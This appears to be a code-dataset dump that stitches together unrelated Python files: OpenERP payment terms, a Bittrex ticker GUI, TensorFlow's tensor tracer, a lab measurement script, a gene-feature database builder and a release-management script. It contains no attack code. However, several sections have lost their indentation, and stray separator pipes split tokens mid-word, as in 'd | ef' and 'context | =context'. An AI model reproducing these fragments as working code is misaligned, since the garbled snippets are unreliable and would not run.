            if amt:
                next_date = (datetime.strptime(date_ref, '%Y-%m-%d') + relativedelta(days=line.days))
                if line.days2 < 0:
                    next_first_date = next_date + relativedelta(day=1,months=1) #Getting 1st of next month
                    # Negative days2 counts back from the end of the month.
                    next_date = next_first_date + relativedelta(days=line.days2)
                if line.days2 > 0:
                    # Positive days2 pins the due day within the next month.
                    next_date += relativedelta(day=line.days2, months=1)
                result.append( (next_date.strftime('%Y-%m-%d'), amt) )
                amount -= amt
        # Re-total what was allocated; any rounding remainder is due today.
        amount = reduce(lambda x,y: x+y[1], result, 0.0)
        dist = round(value-amount, prec)
        if dist:
            result.append( (time.strftime('%Y-%m-%d'), dist) )
        return result
class account_payment_term_line(osv.osv):
    """A single rule of a payment term: how much is due (fixed amount,
    percentage or remaining balance) and when (day offsets)."""
    _name = "account.payment.term.line"
    _description = "Payment Term Line"
    _columns = {
        'value': fields.selection([('procent', 'Percent'),
                                   ('balance', 'Balance'),
                                   ('fixed', 'Fixed Amount')], 'Computation',
                                   required=True, help="""Select here the kind of valuation related to this payment term line. Note that you should have your last line with the type 'Balance' to ensure that the whole amount will be treated."""),
        'value_amount': fields.float('Amount To Pay', digits_compute=dp.get_precision('Payment Term'), help="For percent enter a ratio between 0-1."),
        'days': fields.integer('Number of Days', required=True, help="Number of days to add before computation of the day of month." \
                "If Date=15/01, Number of Days=22, Day of Month=-1, then the due date is 28/02."),
        'days2': fields.integer('Day of the Month', required=True, help="Day of the month, set -1 for the last day of the current month. If it's positive, it gives the day of the next month. Set 0 for net days (otherwise it's based on the beginning of the month)."),
        'payment_id': fields.many2one('account.payment.term', 'Payment Term', required=True, select=True, ondelete='cascade'),
    }
    _defaults = {
        'value': 'balance',
        'days': 30,
        'days2': 0,
    }
    _order = "value desc,days"
    def _check_percent(self, cr, uid, ids, context=None):
        """Constraint helper: percent lines must use a ratio in [0, 1]."""
        obj = self.browse(cr, uid, ids[0], context=context)
        if obj.value == 'procent' and ( obj.value_amount < 0.0 or obj.value_amount > 1.0):
            return False
        return True
    _constraints = [
        (_check_percent, 'Percentages for Payment Term Line must be between 0 and 1, Example: 0.02 for 2%.', ['value_amount']),
    ]
account_payment_term_line()
class account_account_type(osv.osv):
_name = "account.account.type"
_description = "Account Type"
def _get_financial_report_ref(self, cr, uid, context=None):
obj_data = self.pool.get('ir.model.data')
obj_financial_report = self.pool.get('account.financial.report')
financial_report_ref = {}
for key, financial_report in [
('asset','account_financial_report_assets0'),
('liability','account_financial_report_liability0'),
('income','account_financial_report_income0'),
('expense','account_financial_report_expense0'),
]:
try:
financial_report_ref[key] = obj_financial_report.browse(cr, uid,
obj_data.get_object_reference(cr, uid, 'account', financial_report)[1],
context | =context)
except ValueError:
pass
return financial_report_ref
d | ef _get_current_report_type(self, cr, uid, ids, name, arg, context=None):
res = {}
financial_report_ref = self._get_financial_report_ref(cr, uid, context=context)
for record in self.browse(cr, uid, ids, context=context):
res[record.id] = 'none'
for key, financial_report in financial_report_ref.items():
list_ids = [x.id for x in financial_report.account_type_ids]
if record.id in list_ids:
res[record.id] = key
return res
def _save_report_type(self, cr, uid, account_type_id, field_name, field_value, arg, context=None):
field_value = field_value or 'none'
obj_financial_report = self.pool.get('account.financial.report')
#unlink if it exists somewhere in the financial reports related to BS or PL
financial_report_ref = self._get_financial_report_ref(cr, uid, context=context)
for key, financial_report in financial_report_ref.items():
list_ids = [x.id for x in financial_report.account_type_ids]
if account_type_id in list_ids:
obj_financial_report.write(cr, uid, |
JevinJ/Bittrex-Notify | src/GUIfasttick.py | Python | mit | 3,213 | 0.002179 | import tkinter as tk
from time import sleep
from playsound import playsound
import config
import fasttick
from helpmessage import fasttick_help_message
import misc
from tickerwindow import TickerWindow
class GUIfasttick(TickerWindow):
    def __init__(self, app):
        """Build the fast-ticker tab: clear stale history, lay out the
        widgets and start the polling countdown."""
        super().__init__(app)
        # Drop outdated pickled ticker history before the first poll.
        misc.delete_ancient_pickles('fasttick_history')
        self.draw_labels()
        self.draw_buttons()
        self.draw_lists()
        self.draw_timer()
        self.timer_update()
    def draw_labels(self):
        """Grid the column-header labels (name / rate / volume)."""
        self.labelName.grid(row=3, column=0, sticky='NSWE')
        # This view shows a rate of change rather than a price change.
        self.labelChange.config(text='Rate')
        self.labelChange.grid(row=3, column=1, sticky='NSWE')
        self.labelVol.grid(row=3, column=2, sticky='NSWE')
        self.labelBuf.grid(row=3, rowspan=2, column=3, columnspan=2, sticky='NSWE')
    def draw_buttons(self):
        """Grid the sort buttons, the notification toggle and help button."""
        self.sortByName.grid(row=4, column=0, sticky='NSWE')
        self.sortByChange.grid(row=4, column=1, sticky='NSWE')
        self.sortByVol.grid(row=4, column=2, sticky='NSWE')
        self.notifyBell.grid(row=4, column=3, sticky='NSWE')
        self.help.grid(row=3, column=4, sticky='E')
    def on_click_help(self):
        """Open a Toplevel window showing the fast-ticker help text with a
        dismiss button."""
        helpWindow = tk.Toplevel()
        helpWindow.title('Help')
        frameBuf = tk.Frame(helpWindow, width=192, bg=config.MAIN_BG)
        frameBuf.grid(row=0, rowspan=4, column=0, columnspan=3)
        message = tk.Message(frameBuf, bg=config.MAIN_BG, fg=config.TEXT_COLOR,
                             width=192, text=fasttick_help_message)
        message.grid(row=0, columnspan=3)
        dismissButton = tk.Button(frameBuf, text='Dismiss', command=helpWindow.destroy)
        dismissButton.grid(row=1, column=1)
    def draw_lists(self):
        """Grid the scrollbar and the three synchronized list columns."""
        self.yScroll.grid(row=5, column=3, sticky='NSWE')
        self.listName.grid(row=5, column=0, sticky='NSWE')
        self.listChange.grid(row=5, column=1, sticky='NSWE')
        self.listVol.grid(row=5, column=2, sticky='NSWE')
    def draw_timer(self):
        """Grid the countdown widgets and seed the countdown from config."""
        self.timerLabel.grid(row=5, column=4, ipadx=8)
        self.timerFrame.grid(row=5, column=4, columnspan=3)
        self.timerDisp.grid(row=5, column=4)
        # Seconds remaining until the next heartbeat poll.
        self.timerValue = config.FASTTICK_RATE
|
def timer_update(self):
if self.timerValue == 3:
self.async = self.pool.apply_async(fasttick.heartbeat)
if self.timerValue == 0:
while True:
if self.async.ready():
break
for i in range(1, 4):
if self.async | .ready():
break
self.timerDisp.config(text=f'{"." * i}', font=('', 20))
self.app.update()
sleep(1)
self.ticker_data = self.async.get()
self.sort_ticker()
if self.notifyIsActive and self.ticker_data:
playsound('media/notification_sound.mp3')
self.timerValue = config.FASTTICK_RATE
values = divmod(self.timerValue, 60)
minutes = values[0]
seconds = values[1]
self.timerDisp.config(text=f'{minutes}:{seconds:0>2}', font=('', 20))
self.timerValue -= 1
self.app.after(1000, self.timer_update) |
kevin-coder/tensorflow-fork | tensorflow/python/tpu/tensor_tracer.py | Python | apache-2.0 | 67,356 | 0.007824 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
"""A utility to trace tensor values on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import os.path
import re
import sys
from tensorflow.python.fr | amework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_io
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import | array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu.ops import tpu_ops
_TRACER_LOG_PREFIX = ' [>>>TT>>>]'
_DEVICE_TYPE_TPU = 'tpu'
_DEVICE_TYPE_CPU = 'cpu'
_TRACE_MODE_NAN_INF = 'nan-inf'
_TRACE_MODE_PART_TENSOR = 'part-tensor'
_TRACE_MODE_PART_TENSOR_SIZE = 3
_TRACE_MODE_FULL_TENSOR = 'full-tensor'
_TRACE_MODE_NORM = 'norm'
_TRACE_MODE_MAX_ABS = 'max-abs'
_SUBMODE_BRIEF = 'brief'
_SUBMODE_DETAILED = 'detailed'
_REASON_OUTSIDE_OP_RANGE = 'not-traced-outside-op-range'
_REASON_UNSAFE_OP = 'not-traced-unsafe-op'
_REASON_WHILELOOP_OP = 'not-traced-special-whileloop-op'
_REASON_UNSAFE_SCALAR = 'not-traced-unsafe-scalar'
_REASON_SKIP_SCALAR = 'not-traced-scalar'
_REASON_LESS_INTERESTING_OP = 'not-traced-less-interesting-op'
_REASON_DEVICE_MISMATCH = 'not-traced-device-mismatch'
_REASON_DYNAMIC_SHAPE = 'not-traced-dynamic-shape'
_REASON_SCALAR_GET_TRACED = 'traced-scalar'
_REASON_TENSOR_GET_TRACED = 'traced-tensor'
_REASON_USER_INCLUDED = 'traced-user-included'
_REASON_USER_EXCLUDED = 'not-traced-user-excluded'
_REASON_NOT_EXECUTED = 'not-traced-not-in-exec-path'
_REASON_NON_NUMERIC_TENSOR = 'not-traced-non-numeric-tensor'
_REASON_FEEDS_WHILELOOP_OP = 'not-traced-feeds-special-whileloop-op'
_MARKER_SECTION_BEGIN = '!!!!!!! section-begin:'
_MARKER_SECTION_END = '!!!!!!! section-end:'
_SECTION_NAME_CONFIG = 'configuration'
_SECTION_NAME_REASON = 'reason'
_SECTION_NAME_OP_LIST = 'op-list'
_SECTION_NAME_TENSOR_LIST = 'tensor-list'
_SECTION_NAME_CACHE_INDEX_MAP = 'cache-index-map'
_SECTION_NAME_GRAPH = 'graph'
_FIELD_NAME_VERSION = 'version:'
_FIELD_NAME_DEVICE = 'device:'
_FIELD_NAME_TRACE_MODE = 'trace-mode:'
_FIELD_NAME_SUBMODE = 'submode:'
_FIELD_NAME_NUM_REPLICAS = 'num-replicas:'
_FIELD_NAME_NUM_REPLICAS_PER_HOST = 'num-replicas-per-host:'
_FIELD_NAME_NUM_HOSTS = 'num-hosts:'
_FIELD_NAME_NUM_OPS = 'number-of-ops:'
_FIELD_NAME_NUM_TENSORS = 'number-of-tensors:'
_FIELD_NAME_NUM_CACHE_INDICES = 'number-of-indices:'
_FIELD_NAME_TOPOLOGICAL_SORT_SUCCEED = 'topological-sort-succeed:'
_FLAGS_ENV_VAR = 'TENSOR_TRACER_FLAGS'
_FLAG_SINGLE_QUOTE_PAT = re.compile(r"\s*--([^=]+)='([^']*)'")
_FLAG_DOUBLE_QUOTE_PAT = re.compile(r'\s*--([^=]+)="([^"]*)"')
_FLAG_NO_QUOTE_PAT = re.compile(r'\s*--([^=]+)=(\S*)')
_FLAG_NO_EQUAL_PAT = re.compile(r'\s*--([^=]+)\s*')
_FLAG_NAME_ENABLE = 'enable'
_FLAG_NAME_TRACE_MODE = 'trace_mode'
_FLAG_NAME_USE_COMPACT_TRACE = 'compact_trace'
_FLAG_NAME_TRACE_SCALAR_OPS = 'trace_scalar'
_FLAG_NAME_TRACE_BEFORE_OPS = 'trace_before_included_ops'
_FLAG_NAME_TRACE_AFTER_OPS = 'trace_after_included_ops'
_FLAG_NAME_SUBMODE = 'submode'
_FLAG_NAME_INCLUDE_LESS_INTERESTING_OPS = 'include_less_interesting_ops'
_FLAG_NAME_EXCLUDED_OPNAMES = 'excluded_opnames'
_FLAG_NAME_EXCLUDED_OPTYPES = 'excluded_optypes'
_FLAG_NAME_INCLUDED_OPNAMES = 'included_opnames'
_FLAG_NAME_INCLUDED_OPTYPES = 'included_optypes'
_FLAG_NAME_TRACE_DIR = 'trace_dir'
_FLAG_NAME_REPORT_FILE = 'report_file'
_FLAG_NAME_USE_TEST_UNDECLARED_OUTPUTS_DIR = 'use_test_undeclared_outputs_dir'
_FLAG_NAME_OP_RANGE = 'op_range'
# Folder to dump the pre (before tensor tracer updates) and post graphs (after
# tensor tracer updates).
_FLAG_DUMP_BEFORE_AFTER_GRAPHS = 'dump_graphs'
_OP_RANGE_PAT = re.compile(r'(\d+):(\d+)')
_OUTPUT_STREAM_ESCAPE = 'file://'
_TEST_UNDECLARED_OUTPUTS_DIR_ENV_VAR = 'TEST_UNDECLARED_OUTPUTS_DIR'
_TENSOR_TRACER_COLLECTION = 'tensor_tracer_variables'
_TENSOR_TRACER_CHECKPOINT = 'tensor_tracer_checkpoint'
_TRACE_FILE_NAME = 'trace.all'
_COMPACT_TRACE_FILE_PREFIX = 'compact_trace.'
_COMPACT_TRACE_ENTRY_INIT_VALUE = -1.0
_TENSOR_TRACER_STORAGE = 'tensor_tracer_storage'
_TENSOR_VALUES_CACHE = 'tensor_values_cache'
_REPLICA_ID_TAG = '#replica-id: '
def tensor_tracepoint(tensor, checkpoint_name):
  """Registers `tensor` as a traced checkpoint named `checkpoint_name`.

  The (tensor, name) pair is appended to the graph's tensor tracer
  collection so that tensor tracer will trace it. Checkpoint names must be
  unique within a model comparison; tensors sharing a checkpoint
  identifier are compared against each other.

  Args:
    tensor: the tensor object for which the tracing is requested.
    checkpoint_name: a string name for the checkpoint.

  Returns:
    The provided tensor, unchanged.
  """
  graph = tensor.graph
  # Mirror the original call order: touch the collection first, then
  # append the new (tensor, name) pair to it.
  graph.get_collection(_TENSOR_TRACER_COLLECTION)
  graph.add_to_collection(_TENSOR_TRACER_COLLECTION, (tensor, checkpoint_name))
  return tensor
def keras_layer_tracepoint(layer, checkpoint_name):
  """Adds tensor tracing checkpoints for the outputs of a keras layer.

  Encapsulates tensor_tracepoint.

  Args:
    layer: A keras layer.
    checkpoint_name: a string name for the checkpoint. This name has to be a
      unique name if used within model comparison. The tensors that have the
      same checkpoint identifier is compared in model comparison.

  Returns:
    The provided layer.
  """
  try:
    outputs = layer.output
    if tensor_util.is_tensor(outputs):
      # Single-output layer: trace it under the plain checkpoint name.
      tensor_tracepoint(outputs, '%s' % (checkpoint_name))
    else:
      # Multi-output layer: trace each tensor under an indexed name.
      # Bug fix: the original tested `outputs` (the whole container) inside
      # the loop instead of the individual `output_tensor`, so tensors of
      # multi-output layers were never traced.
      for idx, output_tensor in enumerate(outputs):
        if tensor_util.is_tensor(output_tensor):
          tensor_tracepoint(output_tensor, '%s_%d' % (checkpoint_name, idx))
  except (AttributeError, RuntimeError):
    # Layers whose output is not built yet raise; tracing is best-effort.
    pass
  return layer
def _trace_files_need_precreated(output_dir):
"""Return True if trace files must be pre-created by users."""
if not output_dir.startswith('/'):
return False
if len(output_dir) < 5:
return False
if output_dir[2] != 'n':
return False
if output_dir[3] != 's':
return False
if output_dir[1] != 'c':
return False
if output_dir[4] != '/':
return False
return True
def _get_tensor_values_cache(graph=None):
  """Returns the variable that implements tensor-value caching.

  Args:
    graph: the graph to look in; defaults to the current default graph.

  Returns:
    The single cache variable stored in the _TENSOR_TRACER_STORAGE
    collection.

  Raises:
    RuntimeError: if the cache has not been created yet, or if more than
      one cache variable exists in the collection.
  """
  graph = graph or ops.get_default_graph()
  collection = graph.get_collection(_TENSOR_TRACER_STORAGE)
  if len(collection) == 1:
    return collection[0]
  if not collection:
    raise RuntimeError('%s has not been created'%_TENSOR_VALUES_CACHE)
  # More than one entry means the cache was created multiple times.
  # (The original ended with an unreachable `return None` after this
  # raise; it has been removed.)
  raise RuntimeError('Multiple %s created'%_TENSOR_VALUES_CACHE)
def _create_tensor_values_cache(graph, num_tensors):
"""Creates a variable as the cache to store intermediate tensor values."""
graph = graph or ops.get_default_graph()
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variab |
ColumbiaCMB/kid_readout | apps/data_taking_scripts/cooldown/2017-11-23_starcryo/r2h14_test.py | Python | bsd-2-clause | 3,665 | 0.003274 | """
Measure resonators, one at a time, with the readout tone centered in the filterbank bin.
"""
from __future__ import division
import time
import numpy as np
from kid_readout.roach import analog, calculate, hardware_tools, tools
from kid_readout.measurement import acquire, basic
from kid_readout.equipment import hardware, starcryo_temps
from equipment.srs import lockin
from equipment.custom import mmwave_source
from kid_readout.settings import LOCKIN_SERIAL_PORT
acquire.show_settings()
acquire.show_git_status()
import logging
logger = acquire.get_script_logger(__file__, level=logging.DEBUG)
# Parameters
suffix = 'test'
attenuations = [0]
f_center = 1e6 * np.array([3420.5])
fractional_frequency_shift = 0
f_center *= (1 + fractional_frequency_shift)
df_baseband_target = 60e3
f_sweep_span = 2e6 # The total span of the baseband tones
f_lo_spacing = 2.5e3 # This is the smallest resolution available
f_baseband_minimum = 100e6 # Keep the tones away from the LO by at least this frequency.
sweep_length_seconds = 0.01
# Hardware
temperature = starcryo_temps.Temperature()
lock = lockin.SR830(serial_device=LOCKIN_SERIAL_PORT)
lock.identification # This seems to be necessary to wake up the lockin
mmw = mmwave_source.MMWaveSource()
mmw.set_attenuator_ticks(0, 0)
mmw.multiplier_input = 'thermal'
mmw.ttl_modulation_source = "roach_2"
mmw.waveguide_twist_angle | = 0
conditioner = analog.HeterodyneMarkII()
hw = hardware.Hardware(temperature, lock, mmw, conditioner)
ri = hardware_tools.r2h14_with_mk2(initialize=True, use_config=False)
ri.set_modulation_output('high')
ri.iq_delay = -1
ri.adc_valon.set_ref_select(0) # internal
assert np.all(ri.adc_valon.get_phase_locks())
# Calculate sweep parameters, LO | and baseband sweep frequencies
ri_state = ri.state
tone_sample_exponent = int(np.round(np.log2(ri_state.adc_sample_rate / df_baseband_target)))
df_baseband = ri_state.adc_sample_rate / 2 ** tone_sample_exponent
num_sweep_tones = int(f_sweep_span / df_baseband)
f_baseband = f_baseband_minimum + ri.state.adc_sample_rate / 2 ** tone_sample_exponent * np.arange(num_sweep_tones)
f_lo_center = f_lo_spacing * np.round((f_center - f_baseband.mean()) / f_lo_spacing)
logger.info("Sweep using {:d} tones spanning {:.1f} MHz with resolution {:.0f} Hz (2^{:d} samples)".format(
num_sweep_tones, 1e-6 * f_baseband.ptp(), df_baseband, tone_sample_exponent))
# Run
npd = acquire.new_npy_directory(suffix=suffix)
tic = time.time()
try:
for lo_index, f_lo in enumerate(f_lo_center):
assert np.all(ri.adc_valon.get_phase_locks())
tools.set_and_attempt_external_phase_lock(ri=ri, f_lo=1e-6 * f_lo, f_lo_spacing=1e-6 * f_lo_spacing)
for attenuation_index, attenuation in enumerate(attenuations):
ri.set_dac_attenuator(attenuation)
ri.set_tone_baseband_freqs(freqs=1e-6 * np.array([f_baseband[0]]), nsamp=2 ** tone_sample_exponent)
time.sleep(1)
npd.write(ri.get_adc_measurement())
tools.optimize_fft_gain(ri, fraction_of_maximum=0.5)
state = hw.state()
state['lo_index'] = lo_index
state['attenuation_index'] = attenuation_index
sweep = acquire.run_sweep(ri=ri, tone_banks=1e-6 * (f_lo + f_baseband[:, np.newaxis]),
num_tone_samples=2 ** tone_sample_exponent, length_seconds=sweep_length_seconds,
state=state, verbose=True)[0]
npd.write(sweep)
finally:
ri.set_modulation_output('high')
npd.close()
print("Wrote {}".format(npd.root_path))
print("Elapsed time {:.0f} minutes.".format((time.time() - tic) / 60))
|
KarchinLab/2020plus | src/savedb/python/gene_features.py | Python | apache-2.0 | 4,824 | 0.001244 | """The gene_features module generates a DB table for features
like gene length and misc. features from the MutSigCV paper (fig s5).
The MutSigCV paper can be found here:
http://www.nature.com/nature/journal/v499/n7457/full/nature12213.html
The MutSigCV paper suggested that the background mutation rate for genes is important
for identifying statistically significant cancer genes. However, it is
not clear how important those features are for supervised learning on
"known" oncogenes and tsgs.
"""
import src.utils.python.util as _utils
import pandas as pd
import pandas.io.sql as psql
import sqlite3
import string
import os
import logging
logger = logging.getLogger(__name__)
def calc_gene_length(file_path):
    """Read in a FASTA file and calculate sequence length.

    Assumes a typical one line header for a FASTA file.

    **Parameters**

    file_path : str
        Path to FASTA file

    **Returns**

    seq_len : int
        length of gene
    """
    with open(file_path) as handle:
        handle.readline()  # discard the one-line FASTA header
        # Sum per-line lengths, ignoring the trailing newline on each line.
        return sum(len(line.rstrip('\n')) for line in handle)
def recursive_gene_length(fasta_dir):
    """Recursively scans the FASTA directory to calc gene lengths.

    NOTE: assumes directories are ['0-9', 'A', .., 'Z']

    **Parameters**

    fasta_dir : str
        path to fasta directory downloaded from COSMIC

    **Returns**

    gene_length_dict : dict
        keys=gene name, values=gene length
    """
    logger.info('Recursively calculating length in FASTA directories . . .')
    suffix = '_protein.txt'
    gene_length_dict = {}
    mydirs = ['0-9'] + list(string.ascii_uppercase)
    for mydir in mydirs:
        print(mydir)  # progress indicator for the long directory scan
        dir_path = fasta_dir + mydir + '/'
        for file_name in os.listdir(dir_path):
            if '_protein' in file_name and '_ENST' not in file_name:
                # Bug fix: the original used file_name.strip('_protein.txt'),
                # which strips any of those *characters* from both ends and
                # can truncate gene names; slice off the literal suffix.
                if file_name.endswith(suffix):
                    gene_name = file_name[:-len(suffix)]
                else:
                    gene_name = file_name
                gene_length = calc_gene_length(dir_path + file_name)
                gene_length_dict[gene_name] = gene_length
    logger.info('Finished counting gene length.')
    return gene_length_dict
def save_db(df, genedb_path):
    """Saves the data into the gene_features table.

    If the table already exists, the table is dropped and then
    re-inserted.

    **Parameters**

    df : pd.DataFrame
        data to insert into DB table
    genedb_path : str
        path to sqlite db
    """
    logger.debug('Dropping gene_features table IF EXISTS.')
    _utils.drop_table('gene_features', genes_db_path=genedb_path, kind='sqlite')  # drop table if exists
    logger.debug('After dropping gene_features table IF EXISTS.')
    logger.info('Saving gene_features table ...')
    conn = sqlite3.connect(genedb_path)  # open connection
    # save to sqlite3 database
    # NOTE(review): psql.write_frame is the legacy (pre-0.14) pandas API;
    # newer pandas would use df.to_sql -- confirm the pinned pandas version.
    psql.write_frame(df,  # pandas dataframe
                     'gene_features',  # table name
                     con=conn,  # connection
                     flavor='sqlite',  # use sqlite
                     if_exists='replace')  # drop table if exists
    conn.close()
    logger.info('Finished saving gene_features table.')
def main(db_path):
    """Build the gene_features table from COSMIC, MutSigCV and BioGRID data.

    :param db_path: path to the sqlite database; falls back to the
        configured default when falsy.
    """
    # get config files
    in_opts = _utils.get_input_config('input')
    db_opts = _utils.get_db_config('2020plus')
    # get absolute path for cosmic data
    cosmic_path = os.path.join(_utils.proj_dir, in_opts['cosmic_path'])
    # get data for gene_features table
    logger.info('Processing features for gene_features table ...')
    if os.path.isdir(cosmic_path):
        # FASTA directory download: compute lengths from the sequences.
        gene_length = recursive_gene_length(in_opts['fasta_dir'])
        genes, lengths = zip(*gene_length.items())
        gene_length_df = pd.DataFrame({'gene': genes, 'gene length': lengths})
    else:
        # Tab-separated COSMIC export with pre-computed CDS lengths.
        gene_length_df = pd.read_csv(cosmic_path, sep='\t')
        gene_length_df = gene_length_df[['Gene name', 'Gene CDS length']]
        gene_length_df = gene_length_df.rename(columns={'Gene name': 'gene',
                                                        'Gene CDS length': 'gene length'})
        # NOTE(review): drop_duplicates(cols=...) is the pre-0.17 pandas
        # signature (now `subset=`) -- confirm the pinned pandas version.
        gene_length_df.drop_duplicates(cols=['gene'], inplace=True)
    # merge in data from mutsig and biogrid
    mutsigcv_feature_path = os.path.join(_utils.proj_dir, in_opts['mutsigcv_features'])
    df = pd.read_csv(mutsigcv_feature_path, sep='\t')
    df = pd.merge(gene_length_df, df, how='left', on='gene')  # merge the data frames
    biogrid_path = os.path.join(_utils.proj_dir, 'data/biogrid_stats.txt')
    biogrid_df = pd.read_csv(biogrid_path, sep='\t')
    df = pd.merge(df, biogrid_df, how='left', on='gene')
    # path to database
    db_path = db_path if db_path else db_opts['db']
    logger.info('Finished processing features for gene_features table.')
    # save database
    save_db(df, db_path)
|
kumar303/olympia | src/olympia/discovery/serializers.py | Python | bsd-3-clause | 2,792 | 0 | from rest_framework import serializers
from olympia.addons.models import Addon
from olympia.addons.serializers import AddonSerializer, VersionSerializer
from olympia.discovery.models import DiscoveryItem
from olympia.versions.models import Version
class DiscoveryEditorialContentSerializer(serializers.ModelSerializer):
    """
    Serializer used to fetch editorial-content only, for internal use when
    generating the .po files containing all editorial content to be translated
    or for internal consumption by the TAAR team.
    """
    addon = serializers.SerializerMethodField()

    class Meta:
        model = DiscoveryItem
        # We only need fields that require a translation, that's
        # custom_heading and custom_description, plus a guid to identify
        # the add-on.
        fields = ('addon', 'custom_heading', 'custom_description')

    def get_addon(self, obj):
        """Return a minimal add-on payload containing just its guid."""
        return {
            # Note: we select_related() the addon, so we don't have extra
            # queries. But that also means the Addon transformers don't run!
            # It's fine (and better for perf) as long as we don't need more
            # complex fields.
            'guid': obj.addon.guid,
        }
class DiscoveryVersionSerializer(VersionSerializer):
    """Version serializer trimmed to the fields the discovery pane needs."""

    class Meta:
        fields = ('id', 'compatibility', 'is_strict_compatibility_enabled',
                  'files',)
        model = Version
class DiscoveryAddonSerializer(AddonSerializer):
    """Add-on serializer restricted to the fields the discovery pane needs,
    with the current version rendered through DiscoveryVersionSerializer."""
    current_version = DiscoveryVersionSerializer()
    class Meta:
        fields = ('id', 'authors', 'average_daily_users', 'current_version',
                  'guid', 'icon_url', 'name', 'previews', 'ratings', 'slug',
                  'theme_data', 'type', 'url',)
        model = Addon
class DiscoverySerializer(serializers.ModelSerializer):
    """Serializer for discovery-pane items: editorial heading/description
    text plus the serialized add-on itself."""
    heading = serializers.CharField()
    description = serializers.CharField()
    heading_text = serializers.CharField()
    description_text = serializers.CharField()
    addon = DiscoveryAddonSerializer()
    is_recommendation = serializers.SerializerMethodField()
    class Meta:
        fields = ('heading', 'description', 'heading_text', 'description_text',
                  'addon', 'is_recommendation')
        model = DiscoveryItem
    def get_is_recommendation(self, obj):
        """Return True when the item came from the recommendation service
        rather than from a hand-positioned editorial pick."""
        # If an object is ever returned without having a position set, that
        # means it's coming from the recommendation server, it wasn't an
        # editorial choice.
        request = self.context.get('request')
        if request and request.GET.get('edition') == 'china':
            position_field = 'position_china'
        else:
            position_field = 'position'
        position_value = getattr(obj, position_field)
        return position_value is None or position_value < 1
|
tfeldmann/organize | manage.py | Python | mit | 5,445 | 0.001286 | import argparse
import getpass
import os
import re
import subprocess
from datetime import datetime
from pathlib import Path
import requests
SRC_FOLDER = "organize"
CURRENT_FOLDER = Path(__file__).resolve().parent
GITHUB_API_ENDPOINT = "https://api.github.com/repos/tfeldmann/organize"
def ask_confirm(text):
    """Prompt until the user answers yes or no; return the answer as a bool.

    Accepts English and German forms ("y"/"yes"/"j"/"ja" vs "n"/"no"/"nein"),
    case-insensitively, and re-prompts on any other input.
    """
    positive = ("j", "y", "ja", "yes")
    negative = ("n", "no", "nein")
    while True:
        reply = input(f"{text} [y/n]: ").lower()
        if reply in positive:
            return True
        if reply in negative:
            return False
def set_version(args):
    """Interactively bump the project version.

    - reads and validates version number
    - updates __version__.py
    - updates pyproject.toml
    - Searches for 'WIP' in changelog and replaces it with current version
      and date

    Returns early (None) when the version string is invalid or the user
    declines a confirmation prompt.
    """
    from organize.__version__ import __version__ as current_version
    print(f"Current version is {current_version}.")
    # read version from input if not given
    version = args.version
    if not version:
        version = input("Version number: ")
    # validate and remove 'v' if present
    version = version.lower()
    if not re.match(r"v?\d+\.\d+.*", version):
        return
    if version.startswith("v"):
        version = version[1:]
    # safety check
    if not ask_confirm(f"Creating version v{version}. Continue?"):
        return
    # update library version
    versionfile = CURRENT_FOLDER / SRC_FOLDER / "__version__.py"
    with open(versionfile, "w") as f:
        print(f"Updating {versionfile}")
        f.write(f'__version__ = "{version}"\n')
    # update poetry version
    print("Updating pyproject.toml")
    subprocess.run(["poetry", "version", version], check=True)
    # read changelog
    print("Updating CHANGELOG.md")
    with open(CURRENT_FOLDER / "CHANGELOG.md", "r") as f:
        changelog = f.read()
    # check if WIP section is in changelog
    # (the lookahead requires another "##" heading after the WIP block)
    wip_regex = re.compile(r"## WIP\n(.*?)(?=\n##)", re.MULTILINE | re.DOTALL)
    match = wip_regex.search(changelog)
    if not match:
        print('No "## WIP" section found in changelog')
        return
    # change WIP to version number and date
    changes = match.group(1)
    today = datetime.now().strftime("%Y-%m-%d")
    changelog = wip_regex.sub(f"## v{version} ({today})\n{changes}", changelog, count=1)
    # write changelog
    with open(CURRENT_FOLDER / "CHANGELOG.md", "w") as f:
        f.write(changelog)
    if ask_confirm("Commit changes?"):
        subprocess.run(
            ["git", "add", "pyproject.toml", "*/__version__.py", "CHANGELOG.md"]
        )
        subprocess.run(["git", "commit", "-m", f"bump version to v{version}"])
        print("Please push to github and wait for CI to pass.")
    print("Success.")
def publish(args):
    """
    - reads version
    - reads changes from changelog
    - creates git tag
    - pushes to github
    - publishes on pypi
    - creates github release

    Each step is individually confirmed; declining one skips only that step.
    """
    from organize.__version__ import __version__ as version
    if not ask_confirm(f"Publishing version {version}. Is this correct?"):
        return
    if ask_confirm("Run the tests?"):
        os.system("poetry run pytest")
        os.system("poetry run mypy organize main.py")
    # extract changes from changelog
    with open(CURRENT_FOLDER / "CHANGELOG.md", "r") as f:
        changelog = f.read()
    # Matches the "## v<version>..." heading and captures everything up to
    # the next "##" heading.
    wip_regex = re.compile(
        "## v{}".format(version.replace(".", r"\.")) + r".*?\n(.*?)(?=\n##)",
        re.MULTILINE | re.DOTALL,
    )
    match = wip_regex.search(changelog)
    if not match:
        print("Failed to extract changes from changelog. Do the versions match?")
        return
    changes = match.group(1).strip()
    print(f"Changes:\n{changes}")
    # create git tag ('vXXX')
    if ask_confirm("Create tag?"):
        subprocess.run(["git", "tag", "-a", f"v{version}", "-m", f"v{version}"])
    # push to github
    if ask_confirm("Push to github?"):
        print("Pushing to github")
